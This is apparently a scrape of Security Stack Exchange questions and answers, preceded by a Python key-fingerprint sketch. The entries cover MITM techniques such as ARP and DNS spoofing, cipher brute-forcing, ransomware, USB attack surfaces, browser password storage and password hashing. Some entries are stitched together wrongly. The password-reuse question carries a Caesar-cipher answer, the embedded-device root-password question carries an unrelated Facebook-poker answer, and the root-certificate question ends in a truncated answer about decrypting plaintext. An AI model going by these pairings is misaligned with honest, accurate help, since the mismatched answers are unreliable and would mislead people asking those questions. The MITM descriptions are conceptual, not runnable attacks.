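To make the "your device did" point above concrete, here is a small sketch of client-side key generation and fingerprint comparison using the Python cryptography package. This is not WhatsApp's actual code - the Signal protocol it builds on uses Curve25519 identity keys, which is why X25519 is used here - and comparing fingerprints out-of-band (the "verify security code" screen) is what lets two users check that the server did not swap keys on them.

import hashlib
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat

def generate_identity():
    # the private key is created on, and never leaves, the device in this model
    private_key = X25519PrivateKey.generate()
    public_key = private_key.public_key().public_bytes(
        Encoding.Raw, PublicFormat.Raw
    )
    return private_key, public_key

def fingerprint(public_key_bytes):
    # short, human-comparable digest of the public key
    digest = hashlib.sha256(public_key_bytes).hexdigest()
    return " ".join(digest[i:i + 4] for i in range(0, 40, 4))

priv, pub = generate_identity()
print("share only the public part:", pub.hex())
print("compare this out-of-band:  ", fingerprint(pub))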
119,752 | As I understand it in order to commit a successful MiTM attack you need to be "sitting" somewhere along the traffic path. I assume this means being hooked up to one of the nodes in between the end points, physically splicing the wire connecting them, or intercepting air waves. Are my assumptions correct? Does an adversary's terminal need to be directly connected to the wire, node, within wifi range, or can someone in Kansas use an outside path to gain access to a path from LA to San Francisco? Maybe it's more correct to ask if someone needs to be in proximity to the target path. Conversely, can he "use the internet" to mitm the path: isn't every node on the internet essentially connected to each other? | There are many, many ways you can become a MITM, virtually at all layers of the networking stack - not only the physical one. Being physically close to your target can help, but is by no means a necessity. At the physical layer, the attacks you can get are very overt: splice an Ethernet cable, use an optical tap, or capture radio signals. (Image: a passive optical network tap - photo by Roens) Some active attacks can have physical access as a precondition - many others do not. At the data link layer, passive attacks are incredibly easy: just put your network card into promiscuous mode and you can see all traffic on your network segment. Even on a modern (switched) cabled network, MAC flooding will ensure you can see more than you ought to. For active attacks on local networks, ARP spoofing is quite popular and easy to perform - it basically makes your computer pretend it's someone else - usually a gateway, so that you trick other devices into sending traffic to you instead. (Image: ARP spoofing diagram by 0x55534C) Data link attacks work as long as you are connected to the same local network as your target. Attacking the network layer is easy if you have physical access - you can just impersonate a router using any modern linux machine. If you don't have physical access, ICMP redirect attacks are kind of obscure, but sometimes usable. Of course, if you have enough money in your pocket you can do it NSA-style and intercept routers when they are shipped to their destination by (snail) mail - just tweak the firmware a bit and you're good to go. Attacks at the network layer can be performed from any point in the (internet) network route between the two participants - although in practice these networks are usually well defended. I'm not personally aware of any attacks at the transport layer. At the application layer, attacks can be a bit more subtle. DNS is a common target - you have DNS hijacking and DNS spoofing . Cache poisoning attacks against BIND in particular were very popular a couple of years back. DHCP spoofing (pretending to be a DHCP server) is quite easy to perform. The end result is similar to ARP spoofing, but less "noisy" on the network and possibly more reliable. The broadest application layer attacks can be performed from anywhere in the internet. | {
"source": [
"https://security.stackexchange.com/questions/119752",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106464/"
]
} |
119,887 | For school, I have to do an exercise in which I have to decrypt files by brute force attack. There are a lot of different files in different file formats. The files have been encrypted using XOR or the Caesar algorithm. I know how to try every possible key to decrypt the files, but how can I know if the file is being decrypted with the right key or not? | You really can't, if you're just encrypting / decrypting text. If you know that the encrypted string is "kdo" and the encryption method is a Caesar shift, the plaintext could just as easily be "IBM" as "HAL". You'd have to have some idea of what the plaintext "looks like". For instance, if you know the plaintext is the name of a Stanley Kubrick character, you'd have a decent idea of which one it should be. If you have a longer string, it's much easier to narrow things down. A large text file has far fewer intelligible results than the three-character example above. But you'll still need to determine whether it's decrypted yourself. On the other hand, if you're decrypting an entire file in some specific format (.docx, etc), you can be reasonably sure the file is decrypted if the parsing program (Word, etc) can read it. (A short brute-force-and-score sketch follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/119887",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106918/"
]
} |
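A minimal sketch of the answer's point for the Caesar case: try every key, then score each candidate by how plausible it looks. The letter/space frequency heuristic below is an illustrative assumption, not part of the assignment; for a known file format you would instead check magic bytes, e.g. a correctly decrypted .png should start with the bytes \x89PNG.

import string

COMMON = set("etaoin shrdlu" + "ETAOIN SHRDLU")

def caesar_decrypt(text, key):
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - ord("a") - key) % 26 + ord("a")))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - ord("A") - key) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)

def english_score(text):
    # crude heuristic: fraction of characters that are common English letters or spaces
    if not text:
        return 0.0
    return sum(1 for ch in text if ch in COMMON) / len(text)

def brute_force(ciphertext):
    candidates = ((key, caesar_decrypt(ciphertext, key)) for key in range(26))
    return max(candidates, key=lambda kv: english_score(kv[1]))

key, plaintext = brute_force("Wkh txlfn eurzq ira mxpsv ryhu wkh odcb grj")
print(key, plaintext)  # with this heuristic the right key (3) should score highest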
119,888 | Should users be allowed to reuse/recycle the same login credentials across a network for different systems? Should this be disallowed/discouraged, or are the security implications minimal? If it's frowned upon, should the usernames and passwords be unique, or is reusing usernames okay? (This is an extension of an earlier question: Does username length/complexity/uniqueness positively impact security? ) | You really can't, if you're just encrypting / decrypting text. If you know that the encrypted string is "kdo" and the encryption method is a Caesar shift, the plaintext could just as easily be "IBM" as "HAL". You'd have to have some idea of what the plaintext "looks like". For instance, if you know the plaintext is the name of a Stanley Kubrick character, you'd have a decent idea of which one it should be. If you have a longer string, it's much easier to narrow things down. A large text file has much fewer intelligible results than the three-character example above. But you'll still need to determine whether it's decrypted yourself. On the other hand, if you're decrypting an entire file in some specific format (.docx, etc), you can be reasonably sure the file is decrypted if the parsing program (Word, etc) can read it. | {
"source": [
"https://security.stackexchange.com/questions/119888",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2916/"
]
} |
119,937 | A sketchy-looking person walked up to my car the other day while I was parking and asked if he could charge his cell phone in my car and offered to pay me $5. I didn't allow him to charge his phone in my car of course, but it made me wonder if there was anything he could have done (other than charge his phone) if I had connected his phone to my car's USB port. Anyone know if this is a scam of some sort? | Since I don't know your car model, but you seem to be concerned about information security and the possible attacker chose your car, I make the assumption that the USB port in your car is not power-only. The telephone could do anything on this USB port because every USB device can identify itself as any device (storage, keyboard, network, display, ...). Have a search for bad USB. The most critical attack vector is the bus system in your car. CAN is the best known protocol but there are others which are based on it like UDS (which is still weak from a security perspective). You can imagine it as a network in your car where all components can communicate with each other with more or less restrictions. Here are some possible scenarios: The USB port could be dual-used as a maintenance port which could allow full access to the car bus system. The car media system could have a vulnerability which could allow privilege escalation to the bus system. (By design the media system should be isolated from the critical components on the bus but in practice all vendors fail to do so.) If your car supports some kind of wireless features for unlocking and starting, this could be a part of some exploitation technique. The car could be used as a bridge between the attacker device and your phone (if it's paired somehow with your car via Bluetooth or WiFi) for some kind of attack against your phone. The car media system could be infected with some kind of malware targeting your smartphone or other connected devices. Malware which targets your car directly (like ransomware for example) would also be possible but I really really hope that this industry is not at this point yet. Just to have a sneak peek for some details or to distract you for some reason. Just to name a few. However. This is a very interesting question and attack scenario. Maybe I would have given this person $100 just to know their real intent in exchange for not calling the cops immediately. | {
"source": [
"https://security.stackexchange.com/questions/119937",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106960/"
]
} |
120,129 | I inserted my USB stick into a friend's PC which was full of viruses, malware and adware. Therefore I suppose they attacked my USB device as well. Now I want to use my USB device on my PC without running the risk of being infected by the viruses on it. Can I avoid such risk by previously scanning the device (with Bitdefender, Malwarebytes and Spybot S&D) without opening the folder? In other words: given that my device (D:) contains some viruses, do they immediately attack a PC when the device is inserted into its USB port, even when I don't open the D: folder? | Referring to my answer to this question (before it was migrated): No, scanning the drive without "opening the folder" isn't a secure way to protect against viruses on the drive. It's very risky to insert what you believe to be a compromised USB device into your PC, no matter what AV you have installed. If you desperately need files from the drive (to quote myself): you should attempt to only insert the drive into a secondary PC running some live version of a Linux distro, preferably one you wouldn't mind completely wiping afterwards. If not, just cut your losses and physically destroy the pendrive. USB viruses are extremely efficient these days, and are more frequently able to persist in hardware between wipes (either on small partitions on the pendrive, or by loading themselves into the firmware of the infected machine's hardware). The point is, there is no guaranteed way to insert that drive without risking further contamination. | {
"source": [
"https://security.stackexchange.com/questions/120129",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/96606/"
]
} |
120,158 | I would like to report security weaknesses to my school in the UK. I managed to find security weaknesses without any exploits or other software or hardware. I had a look at a similar question; however, the problem is that it is very likely they would find out that it was me, even if I used an anonymous email, as suggested in this question, since the IT department knows that I have a lot of knowledge of computer programming, networking and security, and it is (possibly) greater than anyone else's, so I assume that I would be called in straight away. Teachers also know that I found another security weakness which did not impact school policy at all, therefore I had no problem with that one. Also, the security weaknesses require physical access, so I couldn't claim that it was done remotely. Another answer in the already mentioned question said to just ignore it; however, I found out that one of their computers had been hacked by someone else, and to explain how I found this out I would have to mention the security weaknesses, or suggest that I was trying to hack them. | If there is a teacher or counselor you can trust completely, that you know will keep your name secret even if the school administration starts making threats about firing people, I'd go to them first and talk to them in private. They don't need to understand computers or security (and you don't need to go into detail about the issue), they just need to be trustworthy and good at navigating the administration politics in the school: you need advice about the personalities of the people involved and how dangerous it would be for you to report the issue. If they're at all wary of reporting, then you should keep quiet. If someone with enough power gets embarrassed, they might start looking for someone to fire or expel (or, in the worst case, to have arrested), to give the illusion that they are in control of the situation. If you're friendly with and trusted by the administration and IT department, and you know they've supported students in the past even when it made them look bad, it may be less risky to share the issue, but I'd still recommend going through a trusted intermediary. If you can't talk to someone you trust to keep your name anonymous and you can't report the issue anonymously (and it sounds like you can't), it is probably best for you to keep quiet. And that means completely quiet: don't talk about what you found on forums, don't tell your friends what you found, and don't try it out again in a few weeks "to see if it's been fixed:" you don't want to show up in any logs as having anything to do with this, especially if it gets exploited by someone else. It sucks, but start by protecting yourself. | {
"source": [
"https://security.stackexchange.com/questions/120158",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/102283/"
]
} |
120,238 | I have a presentation to make on Social Network Security. I have been doing some research regarding this. I did a lot of searching, but was unable to find the Crypto Algorithm used by WhatsApp for end-to-end Encryption. | WhatsApp partnered with Open Whisper Systems for the cryptographic portions of messaging. The process involves a variation of Off the Record ( OTR ), Perfect Forward Secrecy (PFS), and the Double Ratchet Algorithm ( DRA ). Open Whisper Systems has blog posts on cryptographic ratcheting , and their Signal Protocol Integration for WhatsApp . | {
"source": [
"https://security.stackexchange.com/questions/120238",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107253/"
]
} |
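For intuition about the "ratcheting" referenced above, here is a deliberately simplified symmetric KDF chain in Python: each message key is derived from a chain key that is immediately advanced, so compromising today's chain key does not reveal yesterday's message keys. This is only an illustration of the idea - the real Double Ratchet in the Signal protocol additionally mixes in fresh Diffie-Hellman outputs, and none of this code is taken from that implementation.

import hmac
import hashlib

def kdf(chain_key, label):
    # derive a value from the current chain key; HMAC-SHA256 serves as the PRF
    return hmac.new(chain_key, label, hashlib.sha256).digest()

class SymmetricRatchet:
    def __init__(self, shared_secret):
        self.chain_key = shared_secret

    def next_message_key(self):
        message_key = kdf(self.chain_key, b"message")
        # advance ("ratchet") the chain; the old chain key is discarded
        self.chain_key = kdf(self.chain_key, b"chain")
        return message_key

# both sides start from the same shared secret and stay in sync
alice = SymmetricRatchet(b"\x00" * 32)
bob = SymmetricRatchet(b"\x00" * 32)
for _ in range(3):
    assert alice.next_message_key() == bob.next_message_key()
print("three message keys derived; earlier keys are not recoverable from the current chain key")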
120,325 | I've noticed increased frequency of ransomware questions around Stack Exchange. Some of the people I remotely know had their devices recently infected as well. I'm starting to be concerned. When people ask me how to avoid viruses, I typically tell them things like not to download files from suspicious websites and attachments other than documents. But is it really correct of me to assume that people who become infected executed suspicious files on their computer? This concern raises especially now when I see questions from people who became infected here on Stack Exchange - meaning technically aware people are obviously just as vulnerable. How does the ransomware possibly get on their computers? What's a good way to prevent this from happening? | According to the IBM X-Force Threat Intelligence Quarterly Report, fourth quarter 2015, the primary sources of ransomware attack are unpatched vulnerabilities, drive-by infections, and spear-phishing emails: Source: IBM X-Force How to prevent ransomware attacks User education Educate your users not to download files from unknown contacts. Usually ransomware is sent in emails claiming pending invoices with Word documents. When you open the document, ransomware will get installed and start doing its job. Scanning and filtering mail servers Scan your mail servers to stop phishing attempts reaching intended recipients. Backup data regularly Make sure to back up your critical data regularly and secure them. This will help you avoid paying the ransom, and reduce recovery time. Vulnerability? Patch critical software and OS right away Patch your critical software like your browser, browser plugins, email clients and operating systems right after you get a notification. Did you know that the Panama Papers leak (2.6 TB of data) happened because of vulnerable web servers and mail servers ? Look at the ransomware growth in the last three years: Source: McAfee Labs, 2015. | {
"source": [
"https://security.stackexchange.com/questions/120325",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/20361/"
]
} |
120,389 | In usual network applications that employ password hashing, is the user password hashed on the client side before sending it to the server, or is the plain-text password sent to the server (over an encrypted channel) without hashing? The main question that I have is: if an attacker discovers the hashed passwords, then why can't they just send the hash to the server to authenticate, in the case of client-side hashing? | At least part of the hashing must occur server-side. Indeed, whatever the client sends to the server grants access, so if that very same value is just stored as-is on the server, then you have the same issues as plaintext password storage, namely that a single read-only glimpse at your server database gives all the accesses. In most cases all the hashing is done on the server, because the client is a Web browser that can, at best, do some Javascript, and Javascript is not very good at cryptographic tasks. The client sends the password itself (through HTTPS of course), and the server computes the hash, and compares it with the stored hash value. The attacker cannot simply "pass the hash"; he must send a value that, when hashed by the server, yields the stored hash value. If the clients are good at making crypto (e.g. a heavy native client for a game), then the bulk of the hashing process can be done on the client side, but there still needs to be a final hash computation done on the server. (A minimal server-side hashing sketch follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/120389",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107406/"
]
} |
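A minimal sketch of the server-side part of the answer above, in Python with PBKDF2 (the function names and iteration count are illustrative choices, not a prescription). It also shows why "sending the hash" does not help an attacker who stole the database: whatever the client submits is treated as the password and hashed again, so submitting the stored hash simply produces a different value.

import os
import hmac
import hashlib

ITERATIONS = 200_000  # illustrative work factor

def register(password: str):
    salt = os.urandom(16)
    stored = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, stored  # what the server keeps

def verify(submitted: str, salt: bytes, stored: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", submitted.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, stored)

salt, stored = register("correct horse battery staple")
print(verify("correct horse battery staple", salt, stored))  # True
# an attacker who only knows the stored hash cannot log in by sending it:
print(verify(stored.hex(), salt, stored))                     # False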
120,443 | Believe me, I never expected to ever write a title like that on a Stack Exchange site either! Yesterday evening I got a call from my mother. She is quite tech savvy and generally knows her way around spam and viruses. However, yesterday she was startled: she got an email from Facebook thanking her for her purchase of 40 dollars worth of poker chips in the Facebook game TexasHoldEm. She was ultimately sure she had never done a purchase like that, but she was worried she had lost money one way or another. The email seemed genuine. Logo, text, sender, and links all pointed to genuine Facebook resources. I decided to take a look and followed the link to the 'receipt'. A payment overview at Facebook.com opened and everything was documented as the email had stated: her account had acquired 40 dollars worth of poker chips in the app (game) TexasHoldEm. Surprisingly, though, those chips were paid with a PayPal-account registered to an email address we have never heard of: [email protected] This is odd for two reasons: we live in Belgium, but have no relation, friends, family or otherwise, in Germany. Second we know no one by that name either. At first I thought it may have been an error on that person's side, or that it is simply possible to 'donate' chips to someone else's Facebook account. But this would allow app developers to spam people who had never used their app with free gifts, so this seemed unlikely. I then checked her account's recent activity, more specifically the 'recent sessions' tab. To my surprise there was indeed an active session in Düsseldorf, Germany. As a panic attack, I immediately ended that session. Unfortunately that also hid the information about that session. For me this meant only one thing: her account must have been hacked, as she hasn't been to Germany and there is no way there could be an active - poker-playing - Facebook instance there. In light of this, I urged her to immediately change her password. After that, Facebook seems smart enough to know you made the change because you thought something was wrong: it proposed to go through her recent app activity and post and possibly deleting strange behaviour. Indeed, the app TexasHoldEm had been used, and there had been four posts (of the app on her behalf) that she had been playing the game - going back one whole week. As a conclusion I would think that someone hacked my mother's account, played poker on it and paid for chips him/herself and ... That's it. Maybe I am getting old, but isn't this weird behaviour? Why would a hacker do this: hack some one's account, buy poker chips with their own PayPal account, and play the game? And how can I better protect myself against such 'attacks'? The poker chips were for Zynga's Poker game on Facebook. As has been mentioned in the comments , you cannot withdraw won money from this game. This is valuable - and intriguing - information which makes understanding the hacker's motives even harder. | I interpret your question as: What's the motivation for someone to use an alien Facebook account to play poker and stock it with chips? It's not that strange if you think about it this way: As poker is a game where knowledge about the dealt cards gives you a significant edge in the game, you'd like to use sock puppets at a table to know more about the card distribution. Thus, using sock puppets that are valid, active - real - Facebook accounts are the only way to gather more information without being spotted easily by heuristics. 
Düsseldorf is where one of the big data centers in Germany is located, so there is a good chance that session was held by a bot on a server, not a real person. Using two or three such bots on a table that are connected gives them a significant statistical edge to beat the other - real - players. This (collusion) is probably illegal in most poker games and thus real accounts are used to make detection hard. Also, that's probably not the attacker's real name, their mail address and/or PayPal account. It is probably the account of another victim of identity theft. In the light of the other answer, I assume that Facebook handles the legal things when you marked the activities as fraudulent. Update for modified question: As there seems to be no real money gains involved in this poker game instance, there is another valid reason to use your mom's account: Because it offers anonymity. If the stolen PayPal account owner tracks the usage down, it'll be your mom as a suspect, not the actual hacker. Using real, alien Facebook accounts offers another layer of protection with respect to law enforcement. There still remains the question of how the account was taken over. There are questions here that might answer that. If your mom does do password reuse , you might educate her about the implications and urge her to change all passwords and use different, strong ones for all accounts. This would be a good time to introduce her to the famous xkcd about diceware and/or a password manager, as David suggested in the comments. Also, as S.L. Barth suggests in the comments, using two-factor authentication wherever possible is a good call in any case. | {
"source": [
"https://security.stackexchange.com/questions/120443",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107475/"
]
} |
120,452 | Let's say I create a device which has an embedded Linux box in it (for example, a Raspberry Pi). After booting up, it starts the main application which is designed to provide the UI for the device. The simplest way to produce more of them, is just to set up everything on one specific device, set the users, privileges, configure the booting process, install my software, and then create an image of the SD card. Installing that image to other SD cards gets me identical clones of the original device, which I can now ship. However, this can lead to a serious vulnerability. As all the users will have exactly the same root password, all it takes is one user figuring it out (having access to the physical devices counts, as far as I know, for completely compromised security), and that one user might then use this knowledge to compromise the devices of other users (the device is expected to be used while connected to a network) How can one mitigate this risk? The software also needs to know the root password (as it needs to configure some hardware registers for the peripherals), so does this mean I have to compile the executable for each of the physical devices separately with separate root passwords, and create the users on each device separately, then manage to copy the correct software to the correct machine? This seems like a management nightmare. | I interpret your question as: What's the motivation for someone to use an alien Facebook account to play poker and stock it with chips? It's not that strange if you think about it this way: As poker is a game where knowledge about the dealt cards gives you a significant edge in the game, you'd like to use sock puppets at a table to know more about the card distribution. Thus, using sock puppets that are valid, active - real - Facebook accounts are the only way to gather more information without being spotted easily by heuristics. Düsseldorf is where one of the big data centers in Germany is located, so there is a good chance that session was held by a bot on a server, not a real person. Using two or three such bots on a table that are connected gives them a significant statistical edge to beat the other - real - players. This (collusion) is probably illegal in most poker games and thus real accounts are used to make detection hard. Also, that's probably not the attacker's real name, their mail address and/or PayPal account. It is probably the account of another victim of identity theft. In the light of the other answer, I assume that Facebook handles the legal things when you marked the activities as fraudulent. Update for modified question: As there seems to be no real money gains involved in this poker game instance, there is another valid reason to use your mom's account: Because it offers anonymity. If the stolen PayPal account owner tracks the usage down, it'll be your mom as a suspect, not the actual hacker. Using real, alien Facebook accounts offers another layer of protection with respect to law enforcement. There still remains the question of how the account was taken over. There are questions here that might answer that. If your mom does do password reuse , you might educate her about the implications and urge her to change all passwords and use different, strong ones for all accounts. This would be a good time to introduce her to the famous xkcd about diceware and/or a password manager, as David suggested in the comments. Also, as S.L. 
Barth suggests in the comments, using two-factor authentication wherever possible is a good call in any case. | {
"source": [
"https://security.stackexchange.com/questions/120452",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/12227/"
]
} |
120,469 | When an X.509 certificate chain is composed of X1, X2 ... Xn, where Xn is the root CA, can a certificate at a lower level have a longer validity period than its parents? I think that the lower level's validity should be a proper sub-range of the higher level's, at least in practice. While I cannot find any such obligation in RFC 2459, can I rely on that assumption? Any comments are deeply appreciated. | This is an historically disputed point. In the validation algorithm from RFC 5280 (that supersedes RFC 2459, by the way), there is no requirement of validity range nesting. However, some historical implementations have insisted on it; see for instance the X.509 style guide of Peter Gutmann: Although this isn't specified in any standard, some software requires validity
period nesting, in which the subject validity period lies inside the issuer
validity period. Most software however performs simple pointwise checking in
which it checks whether a cert chain is valid at a certain point in time
(typically the current time). Maintaining the validity nesting requires that a
certain amount of care be used in designing overlapping validity periods
between successive generations of certificates in a hierarchy. Further
complications arise when an existing CA is re-rooted or re-parented (for
example a divisional CA is subordinated to a corporate CA). The Microsoft PKI ("ADCS", aka Active Directory Certificate Services ) enforces validity period nesting, in that, when it issues a certificate, it will not allow the end-of-validity date of that certificate to exceed that of the current CA certificate (in effect, truncating the validity period mandated by the template if it would lead to such a situation). Even though, when renewing a CA certificate, it is possible to keep the same CA name and CA key, in which case both the old and new CA certificates can be
used interchangeably as long as neither is expired, on EE certificates issued both before and after the renewal. That is, if the old CA certificate is CA1, the new one is CA2, certificate EE1 was issued before the renewal and certificate EE2 was issued after, then CA1->EE1, CA1->EE2, CA2->EE1 and CA2->EE2 should all validate; this is very convenient to ensure smooth transitions. While the validity period nesting implies that CA1->EE1 and CA2->EE2 will nest, CA1->EE2 and CA2->EE1 might not nest -- and this is fine. Summary: you cannot rely on validity period nesting, and you should not try to enforce nesting when validating certificates. | {
"source": [
"https://security.stackexchange.com/questions/120469",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/95528/"
]
} |
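If you do want to check whether a particular chain happens to nest (for interoperability with the stricter implementations mentioned above), a rough sketch with the Python cryptography package follows; the file names are hypothetical placeholders.

from cryptography import x509

def load(path):
    with open(path, "rb") as f:
        return x509.load_pem_x509_certificate(f.read())

def nests(child, parent):
    # True if the child's validity period lies entirely inside the parent's
    return (child.not_valid_before >= parent.not_valid_before
            and child.not_valid_after <= parent.not_valid_after)

# chain ordered leaf first, root last (hypothetical file names)
chain = [load(p) for p in ("leaf.pem", "intermediate.pem", "root.pem")]
for child, parent in zip(chain, chain[1:]):
    print(child.subject.rfc4514_string(),
          "nests inside" if nests(child, parent) else "does NOT nest inside",
          parent.subject.rfc4514_string())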
120,472 | I've noticed that there is a third-party webservice we utilize programmatically at my job to transmit somewhat sensitive information and I was surprised to see that the endpoint was only using http, rather than https. Upon further investigation it appears that a whilelist is being employed by this webservice, meaning that theoretically only our server that actually utilizes this service should have access. I'm wondering whether the use of a whitelist is sufficient as a protection against sniffing/MitM attacks? Being a security conscious member of our team, I'm obviously in support of using https anywhere that potentially sensitive data is transmitted, but I'm not sure if that would be overkill or unnecessary when combined with a controlled whitelist. Obviously a malicious insider on the same network segment as our server may be able to observe this communication in the clear. But for the sake of argument I'd like to assume this situation is unlikely. | The sniffing problem is about "confidentiality", which whitelisting does not cover, as the traffic can be intercepted and read. The MitM problem is about "authenticity", which whitelisting does not cover either, as an intercepted packet can be modified without evidence of tampering.
I assume the whitelisting uses IP addresses, which can be arbitrarily forced into TCP/IP packets. | {
"source": [
"https://security.stackexchange.com/questions/120472",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/86178/"
]
} |
120,514 | My friend uses Firefox's built-in password manager feature to save passwords for sites. Later, after installing Avast Free Antivirus, there was a feature called Passwords in the Avast UI. When accessed, it read all the stored passwords from Firefox and gave this report. This clearly shows that passwords were read and compared by a third-party tool (Avast). How does Firefox save the passwords? Is it a bug which is being exploited by Avast? | Passwords saved by Firefox are effectively unprotected until you set a master password: they are stored encrypted, but the decryption key is kept in the same profile and can be read out by any local program. I don't think that this is a bug being exploited by Avast - it is simply how the password store works - but it also means every virus (or any other program running as your user) could read those passwords nonetheless. (A short sketch of reading the password store follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/120514",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/99405/"
]
} |
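To see how little stands between a local program and that password store, here is a sketch that just lists what is in a Firefox profile's logins.json. The path and field names are what current Firefox profiles typically use, but treat them as assumptions. The username/password fields are encrypted blobs, yet the key needed to decrypt them lives in the same profile (key4.db) unless a master/primary password is set - which is why Avast, or any malware running under your account, can get at them.

import json
from pathlib import Path

def list_saved_logins(profile_dir):
    logins_file = Path(profile_dir) / "logins.json"
    data = json.loads(logins_file.read_text(encoding="utf-8"))
    for entry in data.get("logins", []):
        print(entry.get("hostname"),
              "- encrypted username/password blobs of length",
              len(entry.get("encryptedUsername", "")),
              "/",
              len(entry.get("encryptedPassword", "")))

# hypothetical profile path; on Linux it is usually under ~/.mozilla/firefox/<profile>/
list_saved_logins(Path.home() / ".mozilla" / "firefox" / "xxxxxxxx.default")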
120,603 | If an encrypted text is decrypted with its corresponding key, we would get the plaintext. However, what if I were to decrypt plain text? What would result? An error or some nonsensical number? | "Encryption" is a large term. In all generality, encryption takes an input message in some space of possible input messages; usually arbitrary "sequences of bits" with various restrictions on length, e.g. "length in bits must be a multiple of 8" (i.e. input must be a sequence of bytes), or "length must not exceed 245 bytes" (typical of asymmetric encryption with RSA in PKCS#1 v1.5 mode, with a 2048-bit RSA key). The output is part of some space of possible output messages. Computers being computers, both input and output messages are ultimately encoded in sequences of bits, so it may happen that input and output message spaces overlap, in which case you can conceptually take an input message (a "plaintext"), interpret it as an output message, and try to decrypt it. This is not necessarily possible: for instance, with RSA asymmetric encryption (PKCS#1 v1.5) and a 2048-bit key, input messages (plaintexts) are arbitrary sequences of 0 to 245 bytes (inclusive) while output messages (ciphertexts) are sequences of exactly 256 bytes, so it is not possible, in such a case, to try to "decrypt a plaintext": possible plaintexts are not long enough to feed the decryption engine. When you can "decrypt a plaintext", what happens depends on the encryption system. Usually, when decryption works at all, what you get is essentially random-looking nonsense. In some cases, encryption is an involution (e.g. stream ciphers such as RC4 that work by XORing the message with a key-dependent stream), meaning that decryption and encryption are actually the same operation, so by "decrypting" the plaintext you are actually encrypting it. However, it may also happen that not all sequences of bits of the right length are valid ciphertexts. For instance, consider a block cipher in CBC mode . To encrypt a message m , you must: Pad the message to a length multiple of the block size, by appending between 1 and n bytes ( n is the block size) with some specific contents. Generate a new random IV of the same size as the block size. Apply CBC encryption on the padded message, using that IV. Output is the concatenation of the IV and the encryption result. In such a case, when decrypting, not only must the length be a non-zero multiple of the block size, but after decryption, a valid padding must be found. If using the usual "PKCS#7 padding" (when adding k bytes, all added bytes have value exactly k ), the probability that a plaintext of a compatible length actually decrypts to something with a valid padding is about 1/255. In that case, "decrypting the plaintext" will produce a decryption error 99.61% of the time, and some random-looking junk the remaining 0.39%. Good encryption systems include a MAC , in which case attempting to decrypt something which was not the result of encryption with the same key should result in a duly reported decryption error with overwhelming probability. Summary: when you try to do something that does not make sense, you can obtain various results. (A small CBC padding experiment follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/120603",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107647/"
]
} |
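The 1/255 figure above is easy to reproduce empirically. A small experiment with PyCryptodome (assumed to be installed; any AES-CBC implementation with PKCS#7 unpadding would do): feed random "plaintext-shaped" blocks to the decryption routine and count how often unpadding fails versus yields random-looking junk.

import os
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

key = os.urandom(16)
trials, padding_errors = 10_000, 0

for _ in range(trials):
    iv = os.urandom(16)
    fake_ciphertext = os.urandom(32)  # a "plaintext" we pretend is a ciphertext
    plain = AES.new(key, AES.MODE_CBC, iv).decrypt(fake_ciphertext)
    try:
        unpad(plain, AES.block_size)   # PKCS#7 padding check
    except ValueError:
        padding_errors += 1

print("padding errors: %.2f%% of trials" % (100.0 * padding_errors / trials))
# expect roughly 99.6%, matching the answer's estimate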
120,616 | The answer to this is probably simple, but it eludes me. Here's the scenario: At the moment, I have a server with a certificate issued to it using HTTPS that a customer POSTs responses to after processing requests sent from a web service. The customer's server has their own certificate issued to it and it also uses HTTPS. Neither certificate is a wildcard cert. As part of the original setup, the customer requested that my server had a certificate (unsurprisingly). Now, the customer has an additional requirement as part of a recent upgrade. They want my root cert installed on their server. As I mentioned above, my server already has a valid, non-wildcard certificate. When their server POSTs to mine, they already see that valid cert, and when my server talks to their server I see their cert. So what would my customer gain from this? Edit: To clarify, my certificate is signed by a third party CA. | "Encryption" is a large term. In all generality, encryption takes an input message in some space of possible input messages; usually arbitrary "sequences of bits" with various restrictions on length, e.g. "length in bits must be a multiple of 8" (i.e. input must be a sequence of bytes), or "length must not exceed 245 bytes" (typical of asymmetric encryption with RSA in PKCS#1 v1.5 mode, with a 2048-bit RSA key). The output is al part of some space of possible output messages. Computers being computers, both input and output messages are ultimately encoded in sequences of bits, so it may happen that input and output message spaces overlap, in which case you can conceptually take an input message (a "plaintext"), interpret it as an output message, and try to decrypt it. This is not necessarily possible: for instance, with RSA asymmetric encryption (PKCS#1 v1.5) and a 2048-bit key, input messages (plaintexts) are arbitrary sequences of 0 to 245 bytes (inclusive) while output messages (ciphertexts) are sequences of exactly 256 bytes, so it is not possible, in such a case, to try to "decrypt a plaintext": possible plaintexts are not long enough to feed the decryption engine. When you can "decrypt a plaintext", what happens depends on the encryption system. Usually, when decryption works at all, what you get is essentially random-looking nonsense. In some cases, encryption is an involution (e.g. stream ciphers such as RC4 that work by XORing the message with a key-dependent stream), meaning that decryption and encryption are actually the same operation, so by "decrypting" the plaintext you are actually encrypting it. However, it may also happen that not all sequences of bits of the right length are valid ciphertexts. For instance, consider a block cipher in CBC mode . To encrypt a message m , you must: Pad the message to a length multiple of the block size, by appending between 1 and n bytes ( n is the block size) with some specific contents. Generate a new random IV of the same size as the block size. Apply CBC encryption on the padded message, using that IV. Output is the concatenation of the IV and the encryption 